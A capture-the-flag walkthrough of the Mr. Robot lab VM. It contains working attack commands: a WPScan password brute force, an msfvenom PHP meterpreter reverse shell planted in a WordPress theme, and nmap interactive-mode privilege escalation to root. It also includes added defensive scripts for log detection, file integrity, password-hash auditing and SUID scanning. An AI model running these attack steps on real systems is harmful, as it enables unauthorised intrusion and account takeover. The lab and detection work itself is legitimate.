Mr. Robot CTF Walkthrough

To start, I use netdiscover to find the IP address of the VM. Once I have the IP address, I use nmap to scan for open ports and the services behind them:
nmap -sV 192.168.83.160

[Screenshot: nmap -sV results]

After the scan completes, it shows that port 22, port 80 and port 443 are open, so I try the web server in a browser to see what it will tell us.

[Screenshot: "Hello friend" landing page]

The webpage is very well made. We are greeted with a "Hello friend" message. Next I use Nikto. Nikto is a web server assessment tool, designed to find default and insecure files, configurations and programs on any type of web server (https://cirt.net/nikto2-docs/introduction.html):
nikto -h 192.168.83.160

[Screenshot: Nikto results]

Given the name Mr. Robot, and the robots.txt entry in the Nikto results, I open the robots.txt file in the web browser.

[Screenshot: robots.txt contents]

Once opened, we see a text file and a dictionary file. I use wget to save the text file to my PC and then open it to see what it contains:
wget http://192.168.83.160/key-1-of-3.txt

[Screenshot: wget of key-1-of-3.txt and its contents]

As we can see, we have our first flag!

Now it's time to see what fsocity.dic has in store for us.

[Screenshot: contents of fsocity.dic]

Once opened, I see a very long list of words, so it is a wordlist of some sort. Looking through more of the Nikto results, I notice a wp-login page. Knowing this is a WordPress site, I visit the URL and am prompted with an admin login page.

[Screenshot: WordPress login page]

To start, I try the default username and password admin:admin and get negative results. I notice, though, that the error message says the username is invalid rather than giving a generic failure. Since the CTF is called Mr. Robot, I try the main character's first name, Elliot. This time the error says the password is incorrect for the username Elliot, which confirms the account exists.

[Screenshot: WordPress error messages for invalid username versus incorrect password]

I tried many different passwords by hand with no luck. The next step is brute-forcing the login with WPScan, using fsocity.dic as the wordlist:
wpscan --url http://192.168.83.160 --wordlist /YOUR_DIRECTORY/fsocity.dic --username Elliot

[Screenshot: WPScan brute-force result]

After 5 hours and 17 minutes according to the elapsed time, I finally get the password I need to log in:
ER28-0653
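A five-hour wordlist attack like the one above is anything but quiet on the server side: the access log fills with POST requests to wp-login.php from a single address, each answered with a 200 (the login form re-rendered) until a 302 redirect marks the successful login. The script below is an added example, not part of the original walkthrough or of WPScan; it parses Apache combined-format lines, counts failed wp-login.php POSTs per source in a sliding window, and reports whether a success followed, so the finding is escalated as a probable compromise rather than merely a blocked attempt. The log lines are constructed for the demonstration, and the threshold, window and status-code meanings are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_wp_login_bruteforce(lines, threshold=20, window=timedelta(minutes=5)):
    """Flag source IPs with at least `threshold` failed wp-login.php POSTs inside any
    `window`. Assumption: WordPress answers a failed login with 200 (form re-rendered)
    and a successful one with a 302 redirect to the dashboard."""
    events = defaultdict(list)                      # ip -> [(timestamp, status)]
    for raw in lines:
        rec = parse_line(raw)
        if rec and rec["method"] == "POST" and rec["path"].startswith("/wp-login.php"):
            events[rec["ip"]].append((rec["ts"], rec["status"]))

    findings = {}
    for ip, evs in events.items():
        evs.sort()
        failed = [ts for ts, status in evs if status == 200]
        peak, j = 0, 0                              # sliding window over sorted failures
        for i, ts in enumerate(failed):
            while ts - failed[j] > window:
                j += 1
            peak = max(peak, i - j + 1)
        if peak >= threshold:
            findings[ip] = {
                "peak_failures_in_window": peak,
                "total_failures": len(failed),
                "login_succeeded": any(status == 302 for _, status in evs),
            }
    return findings


def build_sample_log():
    """Constructed log lines (not real traffic): one source hammering wp-login.php
    the way a wordlist attack does and finally succeeding, plus a benign user who
    mistypes a password three times."""
    base = datetime(2023, 10, 10, 13, 55, 0, tzinfo=timezone.utc)

    def line(ip, offset, method, path, status, ua):
        ts = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"'

    lines = [line("10.0.0.5", 0, "GET", "/robots.txt", 200, "Mozilla/5.0")]
    lines += [line("10.0.0.9", 10 + i, "POST", "/wp-login.php", 200, "WPScan") for i in range(30)]
    lines.append(line("10.0.0.9", 40, "POST", "/wp-login.php", 302, "WPScan"))
    lines += [line("10.0.0.5", 100 + 30 * i, "POST", "/wp-login.php", 200, "Mozilla/5.0") for i in range(3)]
    lines.append(line("10.0.0.5", 200, "POST", "/wp-login.php", 302, "Mozilla/5.0"))
    return lines


if __name__ == "__main__":
    for ip, info in detect_wp_login_bruteforce(build_sample_log()).items():
        print(ip, info)
```

Pointed at a real access log (one line per call to `parse_line`), the same function works unchanged; the "login_succeeded" flag is the part worth alerting on, because it separates a noisy failed attempt from an account that now needs its password reset. The differing error messages noted above are what make this attack cheap, since the attacker only has to guess the password once the username is confirmed.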

[Screenshot: logged in to the WordPress dashboard]

Now I am logged in and have access. Time to make a shell to gain further access.

[Screenshot: msfvenom payload generation]

I generate a payload with msfvenom using the following command:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.83.139 lport=4444 -f raw
Copy the output from <?php to die(); and paste it into the theme template (and save it).

[Screenshot: msfconsole handler setup]

Once the PHP is saved into the template, I open Metasploit and start a handler to catch the session:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.83.139
set lport 4444
exploit

[Screenshot: meterpreter session opened]

Now, after visiting http://192.168.0.102/wp-content/themes/twentyfifteen/404.php, I get a meterpreter session. To obtain a proper shell, type:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
This gives you an interactive shell.
ls -las lists the files along with their owners and permissions.
cd /home takes you to the home folder.
cd robot takes you to the robot folder.
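The foothold above came from editing a theme file (404.php) through the WordPress dashboard, so from the defender's side the thing to watch is the theme directory itself. The script below is an added example, not code from the walkthrough or from WordPress: it takes a SHA-256 snapshot of every file under a theme directory and diffs a later snapshot against it, which reveals exactly the kind of edit made here. The directory layout, file contents and the "edited" marker are constructed for the demonstration.

```python
import hashlib
import tempfile
from pathlib import Path


def hash_tree(root):
    """Return {relative_path: sha256 hex} for every regular file under root."""
    root = Path(root)
    return {
        str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def compare_baseline(baseline, current):
    """Diff two hash_tree() snapshots. On a theme directory that nobody updated on
    purpose, any entry in the result deserves an incident ticket."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def demo():
    """Constructed scenario: snapshot a fake theme directory right after install,
    then alter 404.php (as the walkthrough does via the theme editor) and add a
    stray file, and diff the two snapshots."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "wp-content" / "themes" / "twentyfifteen"
        theme.mkdir(parents=True)
        (theme / "404.php").write_text("<?php get_header(); ?>\n")
        (theme / "index.php").write_text("<?php get_header(); get_footer(); ?>\n")
        baseline = hash_tree(theme)                 # clean-install snapshot
        # Later: one template edited (placeholder text, not a payload) and a new file dropped
        (theme / "404.php").write_text("<?php /* constructed: edited via theme editor */ ?>\n")
        (theme / "extra.php").write_text("<?php ?>\n")
        return compare_baseline(baseline, hash_tree(theme))


if __name__ == "__main__":
    print(demo())
```

In practice the baseline is stored off the web host and the comparison runs on a schedule; the matching preventive control is `define('DISALLOW_FILE_EDIT', true);` in wp-config.php, which removes the dashboard theme and plugin editor that this walkthrough relies on.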

[Screenshot: ls -lsa in /home/robot]
[Screenshot: key-2-of-3.txt and password.raw-md5 listed]

Once I run ls, I see the clue for the 2nd flag, so I cat the text file:
cat key-2-of-3.txt
Permission denied
I could see the file in the listing but not read it, so I move on to the next file listed:
cat password.raw-md5
This gives me another clue for flag 2: it's an MD5 hash of a password. So next I need to crack the hash.

[Screenshot: MD5 hash cracked]

The hash cracks to abcdefghijklmnopqrstuvwxyz.
Next I switch to the robot user with su (http://www.linfo.org/su.html), using the password recovered from the MD5 hash, and I have access.
I run another
ls -lsa
then cat the key file:
cat key-2-of-3.txt
Now I have the 2nd flag.
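Two things made this step trivial: the credential file was readable by the low-privileged web user, and it held a bare, unsalted MD5 digest of a weak password. The script below is an added example, not from the walkthrough: it confirms the recovered value against the RFC 1321 test vector for the lowercase alphabet, flags credential lines stored as plain user:md5 pairs, and shows the storage form that would have resisted this (salted PBKDF2 with a constant-time check). The sample lines are constructed in an assumed user:hash layout; the iteration count is an assumption too.

```python
import hashlib
import hmac
import os
import re

# A bare "user:<32 hex chars>" line is the raw-md5 layout seen in password.raw-md5.
RAW_MD5_LINE = re.compile(r"^(?P<user>[^:\s]+):(?P<digest>[0-9a-fA-F]{32})$")

# RFC 1321 test vector: MD5 of the lowercase alphabet, the value recovered above.
ALPHABET = "abcdefghijklmnopqrstuvwxyz"
ALPHABET_MD5 = "c3fcd3d76192e4007dfb496cca67e13b"


def md5_hex(text):
    """Unsalted MD5 of a string, as used by the vulnerable file."""
    return hashlib.md5(text.encode()).hexdigest()


def audit_raw_md5_lines(lines):
    """Return the usernames whose stored credential is a bare user:md5 pair."""
    return [m.group("user") for m in map(RAW_MD5_LINE.match, (l.strip() for l in lines)) if m]


def hash_password(password, salt=None, iterations=200_000):
    """Salted PBKDF2-HMAC-SHA256; a random 16-byte salt defeats precomputed tables and
    the iteration count makes each guess expensive. Format is an assumption of this example."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute the derived key and compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


# Constructed sample credential file: one raw-md5 entry and one properly stored entry.
SAMPLE_FILE = [
    "robot:" + ALPHABET_MD5,
    "svc:" + hash_password("constructed-sample", salt=b"\x00" * 16, iterations=1000),
]


if __name__ == "__main__":
    print("md5 vector matches:", md5_hex(ALPHABET) == ALPHABET_MD5)
    print("raw-md5 accounts:", audit_raw_md5_lines(SAMPLE_FILE))
```

The audit half is the part to run across a host: any file owned by a service account that matches the raw-md5 pattern is a finding regardless of how strong the password behind it is, and fixing the file permissions comes before re-hashing.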

[Screenshot: key-2-of-3.txt contents]

Next I use the nmap interactive shell to get the 3rd and final flag (reference: http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/#gref).
Older versions of nmap supported an option called "interactive". With this option, users could execute shell commands from an nmap "shell" (interactive shell):
nmap --interactive
With the above command you enter the nmap prompt; then type:
!sh
id (to see which user you are running as)
cd /root (takes you into root's home directory)
Once you are in /root, type:
ls -lsa
cat key-3-of-3.txt
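The interactive shell only turns into a privilege escalation because the binary runs with elevated rights, which is the set-user-ID situation the linked article covers; the fix on a real host is to drop the bit (chmod u-s) or remove the old binary. The audit below is an added example, not code from the walkthrough or from nmap: it walks the given roots, lists set-user-ID regular files, and reports any not on an allowlist. The allowlist is an illustrative assumption (build yours from a known-good image), and the fake filesystem used for the offline run is constructed.

```python
import os
import stat
from collections import namedtuple

# Illustrative allowlist (assumption): set-user-ID binaries a Debian-style host ships.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/mount", "/usr/bin/umount",
}


def is_setuid(mode):
    """True for a regular file carrying the set-user-ID bit; directories never count."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_setuid(roots, stat_fn=os.lstat, walk_fn=os.walk):
    """Return (path, owner uid, permission bits) for every set-user-ID file under roots.
    stat_fn and walk_fn are injectable so the scan can run against a fake tree."""
    found = []
    for root in roots:
        for dirpath, _dirs, files in walk_fn(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = stat_fn(path)          # lstat: do not follow symlinks
                except OSError:
                    continue
                if is_setuid(st.st_mode):
                    found.append((path, st.st_uid, oct(stat.S_IMODE(st.st_mode))))
    return found


def unexpected_setuid(found, allowlist=EXPECTED_SUID):
    """Filter the scan result down to binaries that are not on the allowlist."""
    return [entry for entry in found if entry[0] not in allowlist]


# Constructed fake filesystem so the demo runs offline: a legitimate passwd,
# a root-owned set-user-ID nmap (the walkthrough's situation) and a normal tool.
FakeStat = namedtuple("FakeStat", "st_mode st_uid")
FAKE_FS = {
    "/usr/bin/passwd": FakeStat(stat.S_IFREG | 0o4755, 0),
    "/usr/local/bin/nmap": FakeStat(stat.S_IFREG | 0o4755, 0),
    "/usr/local/bin/tool": FakeStat(stat.S_IFREG | 0o755, 0),
}


def fake_walk(root):
    by_dir = {}
    for path in FAKE_FS:
        d, n = os.path.split(path)
        if d == root or d.startswith(root.rstrip("/") + "/"):
            by_dir.setdefault(d, []).append(n)
    return [(d, [], names) for d, names in sorted(by_dir.items())]


def fake_stat(path):
    return FAKE_FS[path]


def demo():
    """Scan the constructed tree and return the unexpected set-user-ID binaries."""
    return unexpected_setuid(find_setuid(["/usr"], stat_fn=fake_stat, walk_fn=fake_walk))


if __name__ == "__main__":
    print("demo:", demo())
    # Real scan of the running host (read-only; needs no privileges beyond directory listing)
    print("host:", unexpected_setuid(find_setuid(["/usr", "/bin", "/sbin"])))
```

Run as-is, the script prints the constructed finding and then a real scan of the current host; diff the host output against the same scan from a fresh image rather than trusting the sample allowlist.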

[Screenshot: key-3-of-3.txt contents]